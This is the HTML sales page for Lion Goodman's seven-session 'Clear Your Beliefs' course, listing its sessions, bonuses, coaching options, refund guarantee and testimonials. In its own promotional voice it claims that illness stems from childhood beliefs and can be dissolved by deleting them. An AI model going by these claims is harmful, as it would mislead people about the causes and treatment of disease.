src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today’s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a></p>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my 